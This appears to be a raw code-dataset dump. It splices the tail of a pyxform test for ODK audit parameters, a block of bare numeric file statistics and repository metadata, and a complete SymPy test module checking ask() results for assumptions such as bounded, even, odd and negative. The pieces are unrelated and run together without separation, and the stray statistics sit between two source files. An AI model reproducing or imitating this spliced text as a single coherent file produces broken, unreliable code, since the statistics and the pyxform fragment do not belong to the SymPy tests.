            | | audit | audit | track-changes-reasons=on-form-edit |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes-reasons="on-form-edit"/>',
            ],
        )

    def test_audit_location_track_changes(self):
        """Location and track-changes parameters can be combined on one bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-priority=balanced, track-changes=true, location-min-interval=60, location-max-age=300 |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:location-max-age="300" odk:location-min-interval="60" odk:location-priority="balanced" odk:track-changes="true"/>',
            ],
        )
| 39.021739
| 189
| 0.381337
| 759
| 10,770
| 5.229249
| 0.106719
| 0.108844
| 0.065508
| 0.136054
| 0.846813
| 0.806752
| 0.758377
| 0.705719
| 0.705719
| 0.682036
| 0
| 0.005431
| 0.504178
| 10,770
| 275
| 190
| 39.163636
| 0.737828
| 0.009099
| 0
| 0.705645
| 0
| 0.060484
| 0.592262
| 0.102733
| 0
| 0
| 0
| 0
| 0.072581
| 1
| 0.072581
| false
| 0
| 0.004032
| 0
| 0.080645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36db7a055743cf3381e48fd6ed5aec72c7fb5dc2
| 44,118
|
py
|
Python
|
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy.core import Symbol, symbols, S, Rational, Integer, I, pi, oo
from sympy.functions import exp, log, sin, cos, sign, re, im, sqrt, Abs
from sympy.assumptions import (Assume, global_assumptions, Q, ask,
register_handler, remove_handler, AssumptionsContext)
from sympy.assumptions.handlers import AskHandler
from sympy.utilities.pytest import raises, XFAIL
def test_int_1():
    """Query every supported assumption about the integer literal 1."""
    value = 1
    checks = [
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, True),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, True),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_float_1():
    """Assumption queries for floats: integral 1.0 versus non-integral 7.2123."""
    # Properties shared by both float values.
    shared = [
        (Q.commutative, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
    ]
    # Properties that differ: 1.0 counts as an (odd, composite) integer.
    cases = [
        (1.0, [(Q.integer, True), (Q.odd, True), (Q.composite, True)]),
        (7.2123, [(Q.integer, False), (Q.odd, False), (Q.composite, False)]),
    ]
    for value, extras in cases:
        for predicate, outcome in shared + extras:
            assert ask(value, predicate) == outcome
def test_zero_0():
    """Integer(0) is even, bounded, infinitesimal, and neither positive nor negative."""
    zero = Integer(0)
    checks = [
        (Q.nonzero, False),
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, False),
        (Q.even, True),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, True),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(zero, predicate) == outcome
def test_negativeone():
    """Integer(-1) is a negative odd integer; not prime and not composite."""
    value = Integer(-1)
    checks = [
        (Q.nonzero, True),
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, True),
        (Q.even, False),
        (Q.odd, True),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_infinity():
    """S.Infinity is extended-real and positive, but not real/complex/bounded."""
    value = S.Infinity
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, True),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_neg_infinity():
    """S.NegativeInfinity mirrors S.Infinity but is negative instead of positive."""
    value = S.NegativeInfinity
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, True),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, True),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_nan():
    """S.NaN is nonzero and commutative; every other queried assumption is False."""
    value = S.NaN
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, False),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.nonzero, True),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_Rational_number():
    """Full assumption sweep on Rational(3,4), then sign checks on more rationals."""
    r = Rational(3, 4)
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(r, predicate) == outcome
    # Sign queries: positive and negative fractions on both sides of 1.
    sign_cases = [
        ((1, 4), True), ((5, 4), True), ((5, 3), True),
        ((-3, 4), False), ((-1, 4), False), ((-5, 4), False), ((-5, 3), False),
    ]
    for (num, den), is_positive in sign_cases:
        q = Rational(num, den)
        assert ask(q, Q.positive) == is_positive
        assert ask(q, Q.negative) == (not is_positive)
def test_sqrt_2():
    """sqrt(2) is a positive, bounded, irrational real."""
    value = sqrt(2)
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, True),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, outcome in checks:
        assert ask(value, predicate) == outcome
def test_pi():
    """Pi, and rational combinations of it, are positive bounded irrational reals.

    The same expectation table applies to every value under test.
    """
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, True),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for value in (S.Pi, S.Pi + 1, 2*S.Pi, S.Pi ** 2, (1+S.Pi) ** 2):
        for predicate, outcome in checks:
            assert ask(value, predicate) == outcome
def test_E():
    """Assumption queries for Euler's number E (positive, real, irrational)."""
    e = S.Exp1
    expectations = [
        (Q.commutative, True), (Q.integer, False), (Q.rational, False),
        (Q.real, True), (Q.complex, True), (Q.irrational, True),
        (Q.imaginary, False), (Q.positive, True), (Q.negative, False),
        (Q.even, False), (Q.odd, False), (Q.bounded, True),
        (Q.infinitesimal, False), (Q.prime, False), (Q.composite, False),
    ]
    for key, expected in expectations:
        assert ask(e, key) == expected
def test_I():
    """Assumption queries for the imaginary unit and simple I-expressions.

    I itself is imaginary; 1 + I and I*(1 + I) are complex but neither real
    nor purely imaginary. Everything else is False for all three.
    """
    I = S.ImaginaryUnit
    true_keys = (Q.commutative, Q.complex, Q.bounded)
    false_keys = (Q.integer, Q.rational, Q.real, Q.irrational,
                  Q.positive, Q.negative, Q.even, Q.odd,
                  Q.infinitesimal, Q.prime, Q.composite)
    for expr, is_imaginary in ((I, True), (1 + I, False), (I*(1 + I), False)):
        for key in true_keys:
            assert ask(expr, key) == True
        for key in false_keys:
            assert ask(expr, key) == False
        assert ask(expr, Q.imaginary) == is_imaginary
def test_bounded():
    """Boundedness queries on symbols, arithmetic and elementary functions.

    NOTE(review): ``Assume(x, Q.bounded, False)`` appears to assert the
    *negation* (x assumed unbounded) — consistent with the other tests here.
    """
    x, y = symbols('xy')
    assert ask(x, Q.bounded) == False
    assert ask(x, Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(x, Q.bounded, Assume(y, Q.bounded)) == False
    assert ask(x, Q.bounded, Assume(x, Q.complex)) == False
    assert ask(x+1, Q.bounded) == False
    assert ask(x+1, Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(x+y, Q.bounded) == None
    assert ask(x+y, Q.bounded, Assume(x, Q.bounded)) == False
    assert ask(x+1, Q.bounded, Assume(x, Q.bounded) & \
               Assume(y, Q.bounded)) == True
    assert ask(2*x, Q.bounded) == False
    assert ask(2*x, Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(x*y, Q.bounded) == None
    assert ask(x*y, Q.bounded, Assume(x, Q.bounded)) == False
    assert ask(x*y, Q.bounded, Assume(x, Q.bounded) & \
               Assume(y, Q.bounded)) == True
    assert ask(x**2, Q.bounded) == False
    assert ask(2**x, Q.bounded) == False
    assert ask(2**x, Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(x**x, Q.bounded) == False
    assert ask(Rational(1,2) ** x, Q.bounded) == True
    assert ask(x ** Rational(1,2), Q.bounded) == False
    # sign function: bounded regardless of its argument
    assert ask(sign(x), Q.bounded) == True
    assert ask(sign(x), Q.bounded, Assume(x, Q.bounded, False)) == True
    # exponential functions
    assert ask(log(x), Q.bounded) == False
    assert ask(log(x), Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(exp(x), Q.bounded) == False
    assert ask(exp(x), Q.bounded, Assume(x, Q.bounded)) == True
    assert ask(exp(2), Q.bounded) == True
    # trigonometric functions: bounded even for unbounded arguments
    assert ask(sin(x), Q.bounded) == True
    assert ask(sin(x), Q.bounded, Assume(x, Q.bounded, False)) == True
    assert ask(cos(x), Q.bounded) == True
    assert ask(cos(x), Q.bounded, Assume(x, Q.bounded, False)) == True
    assert ask(2*sin(x), Q.bounded) == True
    assert ask(sin(x)**2, Q.bounded) == True
    assert ask(cos(x)**2, Q.bounded) == True
    assert ask(cos(x) + sin(x), Q.bounded) == True
@XFAIL
def test_bounded_xfail():
    """We need to support relations in ask for this to work.

    (A third assertion that merely repeated ``sin(x)**x`` with different
    spacing was removed as a duplicate.)
    """
    x = Symbol('x')
    assert ask(sin(x)**x, Q.bounded) == True
    assert ask(cos(x)**x, Q.bounded) == True
def test_commutative():
    """Symbols are commutative by default; an explicit
    Assume(sym, Q.commutative, False) overrides that and propagates
    through sums, products and powers of the symbol."""
    x, y = symbols('xy')
    assert ask(x, Q.commutative) == True
    assert ask(x, Q.commutative, Assume(x, Q.commutative, False)) == False
    assert ask(x, Q.commutative, Assume(x, Q.complex)) == True
    assert ask(x, Q.commutative, Assume(x, Q.imaginary)) == True
    assert ask(x, Q.commutative, Assume(x, Q.real)) == True
    assert ask(x, Q.commutative, Assume(x, Q.positive)) == True
    assert ask(x, Q.commutative, Assume(y, Q.commutative, False)) == True
    assert ask(2*x, Q.commutative) == True
    assert ask(2*x, Q.commutative, Assume(x, Q.commutative, False)) == False
    assert ask(x + 1, Q.commutative) == True
    assert ask(x + 1, Q.commutative, Assume(x, Q.commutative, False)) == False
    assert ask(x**2, Q.commutative) == True
    assert ask(x**2, Q.commutative, Assume(x, Q.commutative, False)) == False
    assert ask(log(x), Q.commutative) == True
def test_complex():
    """ask(Q.complex) for symbols, arithmetic combinations and functions.

    Fix: the original asserted ``ask(exp(x), Q.complex) == True`` twice in a
    row; the duplicate is removed.
    """
    x, y = symbols('xy')
    assert ask(x, Q.complex) == None
    assert ask(x, Q.complex, Assume(x, Q.complex)) == True
    assert ask(x, Q.complex, Assume(y, Q.complex)) == None
    assert ask(x, Q.complex, Assume(x, Q.complex, False)) == False
    assert ask(x, Q.complex, Assume(x, Q.real)) == True
    assert ask(x, Q.complex, Assume(x, Q.real, False)) == None
    assert ask(x, Q.complex, Assume(x, Q.rational)) == True
    assert ask(x, Q.complex, Assume(x, Q.irrational)) == True
    assert ask(x, Q.complex, Assume(x, Q.positive)) == True
    assert ask(x, Q.complex, Assume(x, Q.imaginary)) == True
    # a+b
    assert ask(x+1, Q.complex, Assume(x, Q.complex)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.real)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.rational)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.irrational)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.imaginary)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.integer)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.even)) == True
    assert ask(x+1, Q.complex, Assume(x, Q.odd)) == True
    assert ask(x+y, Q.complex, Assume(x, Q.complex) & Assume(y, Q.complex)) == True
    assert ask(x+y, Q.complex, Assume(x, Q.real) & Assume(y, Q.imaginary)) == True
    # a*x +b
    assert ask(2*x+1, Q.complex, Assume(x, Q.complex)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.real)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.positive)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.rational)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.irrational)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.imaginary)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.integer)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.even)) == True
    assert ask(2*x+1, Q.complex, Assume(x, Q.odd)) == True
    # x**2
    assert ask(x**2, Q.complex, Assume(x, Q.complex)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.real)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.positive)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.rational)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.irrational)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.imaginary)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.integer)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.even)) == True
    assert ask(x**2, Q.complex, Assume(x, Q.odd)) == True
    # 2**x
    assert ask(2**x, Q.complex, Assume(x, Q.complex)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.real)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.positive)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.rational)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.irrational)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.imaginary)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.integer)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.even)) == True
    assert ask(2**x, Q.complex, Assume(x, Q.odd)) == True
    assert ask(x**y, Q.complex, Assume(x, Q.complex) &
               Assume(y, Q.complex)) == True
    # trigonometric expressions
    assert ask(sin(x), Q.complex) == True
    assert ask(sin(2*x + 1), Q.complex) == True
    assert ask(cos(x), Q.complex) == True
    assert ask(cos(2*x+1), Q.complex) == True
    # exponential (asserted once; original had this line duplicated)
    assert ask(exp(x), Q.complex) == True
    # complex-part helpers
    assert ask(Abs(x), Q.complex) == True
    assert ask(re(x), Q.complex) == True
    assert ask(im(x), Q.complex) == True
def test_even():
    """ask(Q.even) across multiples, sums and complex-part helpers.

    Fix: the 2*x*y assertions conjoined two assumptions about *x*; the
    second conjunct must constrain *y*, since the expression is 2*x*y.
    The expected results (None) are unchanged.
    """
    x, y, z, t = symbols('x y z t')
    assert ask(x, Q.even) == None
    assert ask(x, Q.even, Assume(x, Q.integer)) == None
    assert ask(x, Q.even, Assume(x, Q.integer, False)) == False
    assert ask(x, Q.even, Assume(x, Q.rational)) == None
    assert ask(x, Q.even, Assume(x, Q.positive)) == None
    assert ask(2*x, Q.even) == None
    assert ask(2*x, Q.even, Assume(x, Q.integer)) == True
    assert ask(2*x, Q.even, Assume(x, Q.even)) == True
    assert ask(2*x, Q.even, Assume(x, Q.irrational)) == False
    assert ask(2*x, Q.even, Assume(x, Q.odd)) == True
    assert ask(2*x, Q.even, Assume(x, Q.integer, False)) == None
    assert ask(3*x, Q.even, Assume(x, Q.integer)) == None
    assert ask(3*x, Q.even, Assume(x, Q.even)) == True
    assert ask(3*x, Q.even, Assume(x, Q.odd)) == False
    assert ask(x+1, Q.even, Assume(x, Q.odd)) == True
    assert ask(x+1, Q.even, Assume(x, Q.even)) == False
    assert ask(x+2, Q.even, Assume(x, Q.odd)) == False
    assert ask(x+2, Q.even, Assume(x, Q.even)) == True
    assert ask(7-x, Q.even, Assume(x, Q.odd)) == True
    assert ask(7+x, Q.even, Assume(x, Q.odd)) == True
    assert ask(x+y, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd)) == True
    assert ask(x+y, Q.even, Assume(x, Q.odd) & Assume(y, Q.even)) == False
    assert ask(x+y, Q.even, Assume(x, Q.even) & Assume(y, Q.even)) == True
    assert ask(2*x + 1, Q.even, Assume(x, Q.integer)) == False
    # rational/irrational factors do not determine evenness
    assert ask(2*x*y, Q.even, Assume(x, Q.rational) & Assume(y, Q.rational)) == None
    assert ask(2*x*y, Q.even, Assume(x, Q.irrational) & Assume(y, Q.irrational)) == None
    assert ask(x+y+z, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd) &
               Assume(z, Q.even)) == True
    assert ask(x+y+z+t, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd) &
               Assume(z, Q.even) & Assume(t, Q.integer)) == None
    assert ask(Abs(x), Q.even, Assume(x, Q.even)) == True
    assert ask(Abs(x), Q.even, Assume(x, Q.even, False)) == None
    assert ask(re(x), Q.even, Assume(x, Q.even)) == True
    assert ask(re(x), Q.even, Assume(x, Q.even, False)) == None
    assert ask(im(x), Q.even, Assume(x, Q.even)) == True
    assert ask(im(x), Q.even, Assume(x, Q.real)) == True
def test_extended_real():
    """Sign-definite symbols and real + oo are all extended-real."""
    x = symbols('x')
    for expr, key in ((x, Q.positive), (-x, Q.positive), (-x, Q.negative)):
        assert ask(expr, Q.extended_real, Assume(x, key)) == True
    assert ask(x+S.Infinity, Q.extended_real, Assume(x, Q.real)) == True
def test_rational():
    """Rationality is preserved by rational scaling and inversion, and
    destroyed by an irrational factor."""
    x, y = symbols('xy')
    assert ask(x, Q.rational, Assume(x, Q.integer)) == True
    assert ask(x, Q.rational, Assume(x, Q.irrational)) == False
    for key in (Q.real, Q.positive, Q.negative, Q.nonzero):
        assert ask(x, Q.rational, Assume(x, key)) == None
    # rational-preserving single-symbol transforms
    for expr in (2*x, x/2, 1/x, 2/x):
        for key in (Q.rational, Q.integer, Q.even, Q.odd):
            assert ask(expr, Q.rational, Assume(x, key)) == True
        assert ask(expr, Q.rational, Assume(x, Q.irrational)) == False
    # with multiple symbols
    assert ask(x*y, Q.rational,
               Assume(x, Q.irrational) & Assume(y, Q.irrational)) == None
    for key in (Q.rational, Q.integer, Q.even, Q.odd):
        assert ask(y/x, Q.rational,
                   Assume(x, key) & Assume(y, Q.rational)) == True
    assert ask(y/x, Q.rational,
               Assume(x, Q.irrational) & Assume(y, Q.rational)) == False
def test_imaginary():
    """ask(Q.imaginary) for sums and I-multiples of real/imaginary symbols."""
    x, y, z = symbols('x y z')
    I = S.ImaginaryUnit
    assert ask(x, Q.imaginary) == None
    assert ask(x, Q.imaginary, Assume(x, Q.real)) == False
    assert ask(x, Q.imaginary, Assume(x, Q.prime)) == False
    assert ask(x+1, Q.imaginary, Assume(x, Q.real)) == False
    assert ask(x+1, Q.imaginary, Assume(x, Q.imaginary)) == False
    assert ask(x+I, Q.imaginary, Assume(x, Q.real)) == False
    assert ask(x+I, Q.imaginary, Assume(x, Q.imaginary)) == True
    assert ask(x+y, Q.imaginary, Assume(x, Q.imaginary) & \
               Assume(y, Q.imaginary)) == True
    assert ask(x+y, Q.imaginary, Assume(x, Q.real) & \
               Assume(y, Q.real)) == False
    assert ask(x+y, Q.imaginary, Assume(x, Q.imaginary) & \
               Assume(y, Q.real)) == False
    assert ask(x+y, Q.imaginary, Assume(x, Q.complex) & \
               Assume(y, Q.real)) == None
    # multiplying by I rotates real <-> imaginary
    assert ask(I*x, Q.imaginary, Assume(x, Q.real)) == True
    assert ask(I*x, Q.imaginary, Assume(x, Q.imaginary)) == False
    assert ask(I*x, Q.imaginary, Assume(x, Q.complex)) == None
    assert ask(x*y, Q.imaginary, Assume(x, Q.imaginary) & \
               Assume(y, Q.real)) == True
    assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
               Assume(y, Q.real) & Assume(z, Q.real)) == False
    assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
               Assume(y, Q.real) & Assume(z, Q.imaginary)) == None
    assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
               Assume(y, Q.imaginary) & Assume(z, Q.imaginary)) == False
def test_infinitesimal():
    """Infinitesimals stay infinitesimal under scaling, powers, and
    multiplication by bounded or infinitesimal factors."""
    x, y = symbols('x y')
    assert ask(x, Q.infinitesimal) == None
    assert ask(x, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
    assert ask(2*x, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
    assert ask(x*y, Q.infinitesimal, Assume(x, Q.infinitesimal)) == None
    assert ask(x*y, Q.infinitesimal,
               Assume(x, Q.infinitesimal) & Assume(y, Q.infinitesimal)) == True
    assert ask(x*y, Q.infinitesimal,
               Assume(x, Q.infinitesimal) & Assume(y, Q.bounded)) == True
    assert ask(x**2, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
def test_integer():
    """ask(Q.integer) for symbols and simple rational multiples."""
    x = symbols('x')
    assert ask(x, Q.integer) == None
    assert ask(x, Q.integer, Assume(x, Q.integer)) == True
    assert ask(x, Q.integer, Assume(x, Q.integer, False)) == False
    assert ask(x, Q.integer, Assume(x, Q.real, False)) == False
    assert ask(x, Q.integer, Assume(x, Q.positive, False)) == None
    assert ask(x, Q.integer, Assume(x, Q.even) | Assume(x, Q.odd)) == True
    assert ask(2*x, Q.integer, Assume(x, Q.integer)) == True
    assert ask(2*x, Q.integer, Assume(x, Q.even)) == True
    assert ask(2*x, Q.integer, Assume(x, Q.prime)) == True
    assert ask(2*x, Q.integer, Assume(x, Q.rational)) == None
    assert ask(2*x, Q.integer, Assume(x, Q.real)) == None
    assert ask(sqrt(2)*x, Q.integer, Assume(x, Q.integer)) == False
    assert ask(x/2, Q.integer, Assume(x, Q.odd)) == False
    assert ask(x/2, Q.integer, Assume(x, Q.even)) == True
    assert ask(x/3, Q.integer, Assume(x, Q.odd)) == None
    assert ask(x/3, Q.integer, Assume(x, Q.even)) == None
def test_negative():
    """ask(Q.negative) for negation, sums, products and powers.

    Fix: an exact duplicate of the ``ask(-x, Q.negative,
    Assume(x, Q.positive)) == True`` assertion is removed.
    """
    x, y = symbols('xy')
    assert ask(x, Q.negative, Assume(x, Q.negative)) == True
    assert ask(x, Q.negative, Assume(x, Q.positive)) == False
    assert ask(x, Q.negative, Assume(x, Q.real, False)) == False
    assert ask(x, Q.negative, Assume(x, Q.prime)) == False
    assert ask(x, Q.negative, Assume(x, Q.prime, False)) == None
    assert ask(-x, Q.negative, Assume(x, Q.positive)) == True
    assert ask(-x, Q.negative, Assume(x, Q.positive, False)) == None
    assert ask(-x, Q.negative, Assume(x, Q.negative)) == False
    assert ask(x-1, Q.negative, Assume(x, Q.negative)) == True
    assert ask(x+y, Q.negative) == None
    assert ask(x+y, Q.negative, Assume(x, Q.negative)) == None
    assert ask(x+y, Q.negative, Assume(x, Q.negative) &
               Assume(y, Q.negative)) == True
    assert ask(x**2, Q.negative) == None
    assert ask(x**2, Q.negative, Assume(x, Q.real)) == False
    assert ask(x**1.4, Q.negative, Assume(x, Q.real)) == None
    assert ask(x*y, Q.negative) == None
    assert ask(x*y, Q.negative, Assume(x, Q.positive) &
               Assume(y, Q.positive)) == False
    assert ask(x*y, Q.negative, Assume(x, Q.positive) &
               Assume(y, Q.negative)) == True
    assert ask(x*y, Q.negative, Assume(x, Q.complex) &
               Assume(y, Q.complex)) == None
    assert ask(x**y, Q.negative) == None
    assert ask(x**y, Q.negative, Assume(x, Q.negative) &
               Assume(y, Q.even)) == False
    assert ask(x**y, Q.negative, Assume(x, Q.negative) &
               Assume(y, Q.odd)) == True
    assert ask(x**y, Q.negative, Assume(x, Q.positive) &
               Assume(y, Q.integer)) == False
    assert ask(Abs(x), Q.negative) == False
def test_nonzero():
    """ask(Q.nonzero) on symbols, sums, products and Abs."""
    x, y = symbols('xy')
    assert ask(x, Q.nonzero) == None
    assert ask(x, Q.nonzero, Assume(x, Q.real)) == None
    for key in (Q.positive, Q.negative):
        assert ask(x, Q.nonzero, Assume(x, key)) == True
    assert ask(x, Q.nonzero, Assume(x, Q.negative) | Assume(x, Q.positive)) == True
    # same-sign terms cannot cancel; mixed signs can
    assert ask(x+y, Q.nonzero) == None
    assert ask(x+y, Q.nonzero, Assume(x, Q.positive) & Assume(y, Q.positive)) == True
    assert ask(x+y, Q.nonzero, Assume(x, Q.positive) & Assume(y, Q.negative)) == None
    assert ask(x+y, Q.nonzero, Assume(x, Q.negative) & Assume(y, Q.negative)) == True
    # scaling by a nonzero constant
    assert ask(2*x, Q.nonzero) == None
    for key in (Q.positive, Q.negative):
        assert ask(2*x, Q.nonzero, Assume(x, key)) == True
    assert ask(x*y, Q.nonzero, Assume(x, Q.nonzero)) == None
    assert ask(x*y, Q.nonzero, Assume(x, Q.nonzero) & Assume(y, Q.nonzero)) == True
    assert ask(Abs(x), Q.nonzero) == None
    assert ask(Abs(x), Q.nonzero, Assume(x, Q.nonzero)) == True
def test_odd():
    """ask(Q.odd) across multiples, sums and Abs.

    Fix: the 2*x*y assertions conjoined two assumptions about *x*; the
    second conjunct must constrain *y*, since the expression is 2*x*y.
    The expected results (None) are unchanged.
    """
    x, y, z, t = symbols('x y z t')
    assert ask(x, Q.odd) == None
    assert ask(x, Q.odd, Assume(x, Q.odd)) == True
    assert ask(x, Q.odd, Assume(x, Q.integer)) == None
    assert ask(x, Q.odd, Assume(x, Q.integer, False)) == False
    assert ask(x, Q.odd, Assume(x, Q.rational)) == None
    assert ask(x, Q.odd, Assume(x, Q.positive)) == None
    assert ask(-x, Q.odd, Assume(x, Q.odd)) == True
    assert ask(2*x, Q.odd) == None
    assert ask(2*x, Q.odd, Assume(x, Q.integer)) == False
    assert ask(2*x, Q.odd, Assume(x, Q.odd)) == False
    assert ask(2*x, Q.odd, Assume(x, Q.irrational)) == False
    assert ask(2*x, Q.odd, Assume(x, Q.integer, False)) == None
    assert ask(3*x, Q.odd, Assume(x, Q.integer)) == None
    assert ask(x/3, Q.odd, Assume(x, Q.odd)) == None
    assert ask(x/3, Q.odd, Assume(x, Q.even)) == None
    assert ask(x+1, Q.odd, Assume(x, Q.even)) == True
    assert ask(x+2, Q.odd, Assume(x, Q.even)) == False
    assert ask(x+2, Q.odd, Assume(x, Q.odd)) == True
    assert ask(3-x, Q.odd, Assume(x, Q.odd)) == False
    assert ask(3-x, Q.odd, Assume(x, Q.even)) == True
    assert ask(3+x, Q.odd, Assume(x, Q.odd)) == False
    assert ask(3+x, Q.odd, Assume(x, Q.even)) == True
    assert ask(x+y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == False
    assert ask(x+y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.even)) == True
    assert ask(x-y, Q.odd, Assume(x, Q.even) & Assume(y, Q.odd)) == True
    assert ask(x-y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == False
    assert ask(x+y+z, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd) &
               Assume(z, Q.even)) == False
    assert ask(x+y+z+t, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd) &
               Assume(z, Q.even) & Assume(t, Q.integer)) == None
    assert ask(2*x + 1, Q.odd, Assume(x, Q.integer)) == True
    assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.odd)) == True
